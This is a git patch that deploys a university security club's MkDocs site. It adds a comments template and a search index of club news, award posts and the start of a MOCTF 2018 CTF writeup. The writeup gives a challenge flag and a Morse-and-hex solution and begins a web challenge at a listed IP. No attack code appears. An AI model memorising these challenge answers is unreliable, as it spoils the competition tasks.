From 86ada0c0bd90438e31ba7462bb21250cf2e5540d Mon Sep 17 00:00:00 2001 From: icecliffs Date: Sun, 6 Aug 2023 12:16:42 +0800 Subject: [PATCH] Deployed 0caa7ba with MkDocs version: 1.4.3 --- comments.html | 34 ++++++++++++++++++++++++ search/search_index.json | 2 +- sitemap.xml.gz | Bin 615 -> 615 bytes writeup/CISCN-CTF-Quals-2023/index.html | 16 +---------- 4 files changed, 36 insertions(+), 16 deletions(-) create mode 100755 comments.html diff --git a/comments.html b/comments.html new file mode 100755 index 0000000..e31077d --- /dev/null +++ b/comments.html @@ -0,0 +1,34 @@ +{% if page.meta.comments %} +

{{ lang.t("meta.comments") }}

+ + + + +{% endif %} diff --git a/search/search_index.json b/search/search_index.json index 1b21547..7c55937 100755 --- a/search/search_index.json +++ b/search/search_index.json @@ -1 +1 @@ -{"config":{"lang":["ja"],"separator":"[\\s\\-\uff0c\u3002]+","pipeline":["stemmer"]},"docs":[{"location":"","title":"XMUTSEC","text":"

\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08XMUTSEC\uff09 - \u6210\u7acb\u4e8e\u4e8c\u3007\u4e00\u516d\u5e74\u9646\u6708\u4e5d\u65e5\u662f\u8ba1\u7b97\u673a\u5b66\u9662\u6307\u5bfc\u4e0b\u7684\u5b66\u672f\u79d1\u6280\u7c7b\u793e\u56e2\uff0c\u51e0\u4f4d\u5fd7\u540c\u9053\u5408\u7684\u5c11\u5e74\u4eba\u5728\u9e6d\u6c5f\u4e4b\u7554\u4e00\u62cd\u5373\u5408\u6210\u7acb\u4e86\u4e00\u652fCTF\u6218\u961fCodeMonster\u4e0e\u4e4b\u540c\u65f6\u8bde\u751f\u7684\u8fd8\u6709\u5723\u540e\u6eaa\u82f1\u5170\u5fb7\u7687\u5bb6\u5e7c\u513f\u56ed\u9644\u5c5e\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff09\uff0c\u534f\u4f1a\u4e3b\u8981\u7814\u7a76\u7684\u65b9\u5411\u4ee5\u5b89\u5168\u7c7b\u4e3a\u4e3b\uff0c\u6b64\u5916\uff0c\u534f\u4f1a\u4e5f\u4f1a\u7ec4\u7ec7\u5b66\u751f\u53c2\u52a0\u5b66\u672f\u7ade\u8d5b\uff0c\u4e3e\u529e\u5b66\u672f\u4ea4\u6d41\u7b49\u7b49\u3002

\u534f\u4f1a\u5b98\u7f51\uff1ahttps://www.xmutsec.cn

"},{"location":"#_1","title":"\u52a0\u5165\u6211\u4eec","text":"

\u52a0\u5165\u6807\u51c6 \uff08\u6ee1\u8db3\u4ee5\u4e0b\u4e24\u4e2a\u6761\u4ef6\u5373\u53ef\uff0c\u5305\u62ec\u54c1\u884c\u7aef\u6b63\uff09 - \u54c1\u884c\u7aef\u6b63

"},{"location":"#_2","title":"\u5b66\u4e60\u65b9\u5f0f","text":""},{"location":"award/","title":"\u8db3\u8ff9","text":""},{"location":"award/#_2","title":"\u8db3\u8ff9","text":""},{"location":"award/#_3","title":"\u4e3b\u529e","text":""},{"location":"award/#2023","title":"2023","text":"

\uff08FUCK U, COVID-19/\ud83d\udc47\uff09

"},{"location":"award/#2022","title":"2022","text":""},{"location":"award/#2021","title":"2021","text":"

\uff08FUCK U, COVID-19/\ud83d\udc46\uff09

"},{"location":"award/#2020","title":"2020","text":""},{"location":"award/#2019","title":"2019","text":""},{"location":"award/#2018","title":"2018","text":""},{"location":"award/#2017","title":"2017","text":""},{"location":"award/#2016","title":"2016","text":""},{"location":"member/","title":"\u534f\u4f1a\u6210\u5458","text":""},{"location":"member/#2021-2022","title":"2021-2022","text":""},{"location":"member/#2020-2021","title":"2020-2021","text":""},{"location":"member/#2019-2020","title":"2019-2020","text":""},{"location":"member/#2018-2019","title":"2018-2019","text":""},{"location":"member/#2017-2018","title":"2017-2018","text":""},{"location":"member/#2016-2017","title":"2016-2017","text":""},{"location":"posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956","text":"

\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u53c8\u6709\u4e86\u65b0\u52a8\u5411\u300212\u67087\u65e5\uff0c2017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u603b\u51b3\u8d5b\u5728\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66\u76db\u5927\u5f00\u5e55\uff0c\u6765\u81ea\u5168\u56fd57\u6240\u9ad8\u6821\u7684\u7f51\u7edc\u5b89\u5168\u5b9e\u6218\u8d5b\u961f\u5728\u201c\u6570\u636e\u8d5b\u3001\u4f01\u4e1a\u8d5b\u3001\u4e2a\u4eba\u8d5b\u201c\u4e09\u4e2a\u65b9\u5411\u6bd4\u8d5b\u4e2d\u4e00\u51b3\u9ad8\u4e0b\uff0c\u4e3a\u5168\u56fd\u7f51\u7edc\u5b89\u5168\u5e02\u573a\u63d0\u4f9b\u4e86\u65b0\u4e00\u6279\u9ad8\u7aef\u4eba\u624d\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"

\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster\u6218\u961f\u5168\u7701\u7b2c\u4e09\u593a\u5f97\u4e00\u7b49\u5956\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/","title":"\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6210\u7acb","text":"

\u672c\u534f\u4f1a\u6210\u7acb\u4e8e2016\u5e746\u67089\u65e5\uff0c\u81f4\u529b\u4e8e\u5bf9\u4fe1\u606f\u5b89\u5168\u65b9\u9762\u7684\u63a2\u7d22\u4e0e\u521b\u65b0\uff0c\u65e8\u5728\u4e3a\u6211\u6821\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u63d0\u4f9b\u4e00\u4e2a\u4ea4\u6d41\u5e73\u53f0\uff0c\u6269\u5927\u4fe1\u606f\u5b89\u5168\u5728\u6211\u6821\u7684\u5f71\u54cd\u529b\u3002

","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#_1","title":"\u534f\u4f1a\u6d3b\u52a8","text":"

\u672c\u534f\u4f1a\u901a\u8fc7\u53c2\u52a0CTF\u7ade\u8d5b\u7684\u5f62\u5f0f\u9a8c\u8bc1\u81ea\u5df1\u7684\u4fe1\u606f\u5b89\u5168\u6280\u672f\u6c34\u5e73 \u5404\u4f4d\u5927\u4f6c\u548c\u840c\u65b0\u53ef\u4ee5\u53bb\u534f\u4f1aCodeMonster\u6218\u961f\u4e0e\u96c6\u7f8e\u5927\u5b66\u4fe1\u5b89\u534f\u4f1a\u7684Mokirin\u6218\u961f\u5171\u540c\u642d\u5efa\u7ef4\u62a4\u7684MOCTF\u5e73\u53f0\u8fdb\u884c\u65e5\u5e38CTF\u5237\u9898\u3002

","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#ctf","title":"CTF\u4ecb\u7ecd","text":"

CTF\uff08Capture The Flag\uff09\u4e2d\u6587\u4e00\u822c\u8bd1\u4f5c\u593a\u65d7\u8d5b\uff0c\u5728\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d\u6307\u7684\u662f\u7f51\u7edc\u5b89\u5168\u6280\u672f\u4eba\u5458\u4e4b\u95f4\u8fdb\u884c\u6280\u672f\u7ade\u6280\u7684\u4e00\u79cd\u6bd4\u8d5b\u5f62\u5f0f\u3002CTF\u8d77\u6e90\u4e8e1996\u5e74DEFCON\u5168\u7403\u9ed1\u5ba2\u5927\u4f1a\uff0c\u4ee5\u4ee3\u66ff\u4e4b\u524d\u9ed1\u5ba2\u4eec\u901a\u8fc7\u4e92\u76f8\u53d1\u8d77\u771f\u5b9e\u653b\u51fb\u8fdb\u884c\u6280\u672f\u6bd4\u62fc\u7684\u65b9\u5f0f\u3002\u53d1\u5c55\u81f3\u4eca\uff0c\u5df2\u7ecf\u6210\u4e3a\u5168\u7403\u8303\u56f4\u7f51\u7edc\u5b89\u5168\u5708\u6d41\u884c\u7684\u7ade\u8d5b\u5f62\u5f0f\uff0c2013\u5e74\u5168\u7403\u4e3e\u529e\u4e86\u8d85\u8fc7\u4e94\u5341\u573a\u56fd\u9645\u6027CTF\u8d5b\u4e8b\u3002\u800cDEFCON\u4f5c\u4e3aCTF\u8d5b\u5236\u7684\u53d1\u6e90\u5730\uff0cDEFCON CTF\u4e5f\u6210\u4e3a\u4e86\u76ee\u524d\u5168\u7403\u6700\u9ad8\u6280\u672f\u6c34\u5e73\u548c\u5f71\u54cd\u529b\u7684CTF\u7ade\u8d5b\uff0c\u7c7b\u4f3c\u4e8eCTF\u8d5b\u573a\u4e2d\u7684\u201c\u4e16\u754c\u676f\u201d \u3002 CTF\u5927\u81f4\u6d41\u7a0b\u662f\uff0c\u53c2\u8d5b\u56e2\u961f\u4e4b\u95f4\u901a\u8fc7\u8fdb\u884c\u653b\u9632\u5bf9\u6297\u3001\u7a0b\u5e8f\u5206\u6790\u7b49\u5f62\u5f0f\uff0c\u7387\u5148\u4ece\u4e3b\u529e\u65b9\u7ed9\u51fa\u7684\u6bd4\u8d5b\u73af\u5883\u4e2d\u5f97\u5230\u4e00\u4e32\u5177\u6709\u4e00\u5b9a\u683c\u5f0f\u7684\u5b57\u7b26\u4e32\u6216\u5176\u4ed6\u5185\u5bb9\uff0c\u5e76\u5c06

","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6d1aa499-57ee-401b-a911-8062c6cae869/","title":"360\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7b2c\u56db\u540d","text":"

\u5317\u4eac\u65f6\u95f411\u670823\u65e5\uff0c\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u4e8e\u798f\u5dde\u6b63\u5f0f\u5f00\u6218\u3002\u4f5c\u4e3a\u4e00\u9879\u5bf9\u4ea7\u54c1\u5b89\u5168\u4e25\u683c\u8981\u6c42\u3001\u5411\u9ed1\u5ba2\u7cbe\u795e\u6781\u81f4\u8ffd\u9010\u3001\u7ed9\u4e88\u53c2\u8d5b\u9009\u624b\u9ad8\u989d\u5956\u52b1\u7684\u9ed1\u5ba2\u8d5b\u4e8b\uff0c\u672c\u5c4a\u9ed1\u5ba2\u9a6c\u62c9\u677e\u5438\u5f15\u4e86\u6765\u81ea\u5168\u56fd\u8fd110\u652f\u5b66\u751f\u9ed1\u5ba2\u6218\u961f\u53c2\u8d5b\uff0c\u5176\u4e2d\u5305\u62ec\u6765\u81ea\u53f0\u6e7e\u5730\u533a\u7684BambooFox\u548cTDOH\u4e24\u652f\u6218\u961f\u3002

48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7531360\u5b89\u5168\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u4e3b\u529e\u7684\u9762\u5411360\u516c\u53f8IoT\u8bbe\u5907\u7684\u6f0f\u6d1e\u5956\u52b1\u8d5b\u4e8b\uff0c\u8bbe\u7f6e\u4e8636\u4e07\u4eba\u6c11\u5e01\u5956\u91d1\u6c60\uff0c\u5355\u4e2a\u6f0f\u6d1e\u5956\u52b1\u6700\u9ad8\u53ef\u8fbe5\u4e07\u5143\u3002

\u5c11\u5e74\u90ce\u5251\u8bd5\u5929\u4e0b\n

\u9ed1\u5ba2\u9a6c\u62c9\u677e\u6982\u5ff5\u6e90\u81ea\u7f8e\u56fd\uff0c\u5f53\u4e00\u7fa4\u9ad8\u624b\u4e91\u96c6\u4e00\u5802\uff0c\u4e92\u76f8\u6c9f\u901a\u548c\u5b66\u4e60\uff0c\u8fd9\u5c31\u6210\u4e86\u201d\u4e16\u754c\u4e0a\u6700\u9177\u7684\u6280\u672f\u72c2\u6b22\u201d\u3002\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u8d5b\u91c7\u7528\u4e8648\u5c0f\u65f6\u6781\u9650\u6f0f\u6d1e\u6316\u6398\u548c\u7834\u89e3\u76ee\u6807\u968f\u673a\u9009\u5b9a\u7684\u8d5b\u5236\uff0c\u53c2\u8d5b\u9009\u624b\u9700\u8981\u5728\u6bd4\u8d5b\u671f\u95f4\u8fde\u7eed\u4e0d\u4e2d\u65ad\u5730\u5bf9\u7279\u5b9a\u4ea7\u54c1\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\uff0c\u6bcf\u961f\u53ea\u914d\u5907\u4e00\u95f4\u4f11\u606f\u5ba4\u4ee5\u4f9b\u9009\u624b\u201c\u56de\u8840\u201d\u3002\u5728\u8fd9\u6837\u77ed\u7684\u65f6\u95f4\u5185\u5bfb\u627e\u7531\u5b89\u5168\u4eba\u5458\u53cd\u590d\u628a\u5173\u7684\u4ea7\u54c1\u6f0f\u6d1e\uff0c\u5e76\u975e\u6613\u4e8b\u3002\u4e0d\u8fc7\uff0c\u6ca1\u6709\u7edd\u5bf9\u5b89\u5168\u7684\u7cfb\u7edf\uff0c\u6211\u4eec\u4e5f\u5728\u671f\u5f85\u7740\u4ed6\u4eec\u7684\u7cbe\u5f69\u8868\u73b0\uff0c\u4e3a\u63d0\u5347360\u4ea7\u54c1\u5b89\u5168\u6027\u800c\u5927\u5c55\u8eab\u624b\uff01

\u9ed1\u4e0d\u662f\u76ee\u7684\uff0c\u5b89\u5168\u624d\u662f\u738b\u9053\n

360\u96c6\u56e2\u4f5c\u4e3a\u4e2d\u56fd\u9886\u5148\u7684\u4e92\u8054\u7f51\u7edc\u5b89\u5168\u4f01\u4e1a\uff0c\u6c47\u805a\u4e86\u56fd\u5185\u89c4\u6a21\u9886\u5148\u7684\u9ad8\u6c34\u5e73\u5b89\u5168\u6280\u672f\u56e2\u961f\uff0c\u79ef\u7d2f\u4e86\u63a5\u8fd1\u4e07\u4ef6\u539f\u521b\u6280\u672f\u548c\u6838\u5fc3\u6280\u672f\u7684\u4e13\u5229\uff0c\u5e76\u5728\u6b64\u57fa\u7840\u4e0a\u5f00\u53d1\u51fa\u62e5\u6709\u6570\u4ebf\u7528\u6237\u7684360\u5b89\u5168\u536b\u58eb\u3001360\u624b\u673a\u536b\u58eb\u7b49\u5b89\u5168\u4ea7\u54c1\uff0c\u540c\u65f6\u4e3a\u4e0a\u767e\u4e07\u5bb6\u56fd\u5bb6\u673a\u5173\u548c\u4f01\u4e8b\u4e1a\u5355\u4f4d\u63d0\u4f9b\u5305\u62ec\u5b89\u5168\u54a8\u8be2\u3001\u5b89\u5168\u8fd0\u7ef4\u3001\u5b89\u5168\u57f9\u8bad\u7b49\u5168\u65b9\u4f4d\u5b89\u5168\u670d\u52a1\u3002

\u6000\u63e3\u7528\u6237\u5b89\u5168\u7b2c\u4e00\u7684\u76ee\u7684\u548c\u51b3\u5fc3\uff0c48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u9080\u8bf7\u5230\u9ad8\u6821\u5b66\u751f\u5bf9\u6307\u5b9a\u4ea7\u54c1\u8fdb\u884c\u5168\u9762\u6f0f\u6d1e\u6316\u6398\uff0c\u8003\u9a8c\u7684\u4e0d\u4ec5\u4ec5\u662f\u4e66\u672c\u4e0a\u7684\u77e5\u8bc6\uff0c\u8fd8\u6709\u4e2a\u4eba\u7684\u6280\u672f\u5b9e\u529b\u4e0e\u56e2\u961f\u7684\u534f\u540c\u914d\u5408\u3002\u6bd4\u8d5b\u4e00\u65b9\u9762\u53ef\u4ee5\u63d0\u5347360\u4ea7\u54c1\u7684\u5b89\u5168\u6027\uff0c\u53e6\u4e00\u65b9\u9762\u5219\u80fd\u4fc3\u8fdb\u65b0\u751f\u4ee3\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u4ea4\u6d41\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u4ece\u4e1a\u8005\u7684\u6280\u672f\u6c34\u5e73\uff0c\u5171\u540c\u6253\u9020\u66f4\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/","title":"\u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"

\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u6bd4\u8d5b\u6d77\u62a5\uff1a

\u6bd4\u8d5b\u73b0\u573a\uff1a

\u6bd4\u8d5b\u6392\u884c\u699c\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"

\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster\u6218\u961f\u5168\u7701\u7b2c\u516d\u593a\u5f97\u4e8c\u7b49\u5956\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u6bd4\u8d5b\u73b0\u573a\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_2","title":"\u6bd4\u8d5b\u89c6\u9891","text":"

\u6bd4\u8d5b\u89c6\u9891\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/86e69101-77f4-484a-ba0e-2957afabbdb6/","title":"2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956","text":"

\u7531\u56fd\u5bb6\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u7f51\u7edc\u5b89\u5168\u534f\u8c03\u5c40\u3001\u516c\u5b89\u90e8\u7f51\u7edc\u5b89\u5168\u4fdd\u536b\u5c40\u6307\u5bfc\uff0c\u6d59\u6c5f\u7701\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u3001\u6d59\u6c5f\u7701\u516c\u5b89\u5385\u3001\u676d\u5dde\u5e02\u4eba\u6c11\u653f\u5e9c\u4e3b\u529e\uff0c\u676d\u5dde\u5e02\u7ecf\u6d4e\u548c\u4fe1\u606f\u5316\u59d4\u5458\u4f1a\u3001\u676d\u5dde\u5e02\u8427\u5c71\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u676d\u5dde\u5b89\u6052\u4fe1\u606f\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u627f\u529e\uff0c\u676d\u5dde\u5e02\u6ee8\u6c5f\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u3001\u56fd\u5bb6\u5de5\u4e1a\u4fe1\u606f\u5b89\u5168\u53d1\u5c55\u7814\u7a76\u4e2d\u5fc3\u3001\u56fd\u5bb6\u8ba1\u7b97\u673a\u7f51\u7edc\u5e94\u6025\u6280\u672f\u5904\u7406\u534f\u8c03\u4e2d\u5fc3\u3001\u963f\u91cc\u4e91\u8ba1\u7b97\u6709\u9650\u516c\u53f8\u3001\u676d\u5dde\u6d77\u5eb7\u5a01\u89c6\u6570\u5b57\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u6d59\u6c5f\u5927\u534e\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u8054\u5408\u627f\u529e\u7684\u897f\u6e56\u8bba\u5251\u2022\u7f51\u7edc\u5b89\u5168\u5927\u4f1a\u5b9a\u6863\u4eca\u5e744\u670827\u65e5\uff0c\u897f\u6e56\u8bba\u5251\u676f\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f5c\u4e3a\u672c\u6b21\u8bba\u575b\u4e2d\u6700\u53d7\u77a9\u76ee\u7684\u90e8\u5206\u4e4b\u4e00\uff0c\u4e5f\u5c06\u4e8e4\u670826\u65e5\u5f00\u542f\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/","title":"2018 \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09","text":"

\u81ea\u5df1\u53bb\u770b\u5427 http://www.ciscn.cn/home

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/","title":"\u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b","text":"

\u4ece\u653e\u5047\u5230\u73b0\u5728\u7b79\u529e\u51c6\u5907\u4e86\u63a5\u8fd1\u4e24\u4e2a\u661f\u671f\u7684MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u7ec8\u4e8e\u843d\u5e55\u5566\uff0c\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e00\u5171\u51fa\u4e861\u7b7e\u5230+1MISC+3WEB\uff0c\u4e0b\u9762\u5148\u653e\u5b98\u65b9WriteUp\uff08\u54c7\u7ec8\u4e8e\u80fd\u5f53\u4e00\u56de\u5b98\u65b9\u4e86\uff09

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_1","title":"\u7b7e\u5230","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#20","title":"\u7b7e\u5230 20","text":"
\u652f\u4ed8\u5b9d\u4eca\u5e74\u96c6\u9f50\u4e94\u798f\u80fd\u4e00\u8d77\u5e73\u5206\u591a\u5c11\u94b1\uff1f\nflag\u683c\u5f0f\uff1amoctf{\u6570\u5b57}\n

flag:moctf{500000000}

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#misc","title":"MISC","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#word-100","title":"\u7a7aword 100","text":"
\u771f\u7684\u4ec0\u4e48\u90fd\u6ca1\u6709\u5417\n

\u6587\u4ef6\u662f\u4e2aword \u6253\u5f00\u770b\u53d1\u73b0\u4e00\u4e9b\u5947\u602a\u7684\u6362\u884c\u548ctab \u5f88\u5bb9\u6613\u60f3\u5230\u662f\u6469\u65af\u5bc6\u7801\uff0c\u66ff\u6362\u540e\u5f97\u5230

-.... -.. -.... ..-. -.... ...-- --... ....- -.... -.... --... -... ....- ..--- -.... -.-. ...-- ....- -.... . -.... -... ..... ..-. ...-- ----- --... ..--- ..... ..-. --... ....- -.... .---- -.... ..--- ...-- ..-. --... -..\n

\u89e3\u6469\u65af\u5bc6\u7801\uff0c\u7136\u540ehex\u8f6c\u5b57\u7b26\u4e32\u5f97\u5230flag

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#web","title":"WEB","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#300","title":"\u767b\u5f55\u4e00\u54c8 300","text":"
\u767b\u5f55\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u3002\nhttp://111.230.32.124:6001/\n

\u6e90\u7801\u653e\u5230git\u91cc\u6cc4\u9732\u7ed9\u5927\u5bb6\u4e86 index.php

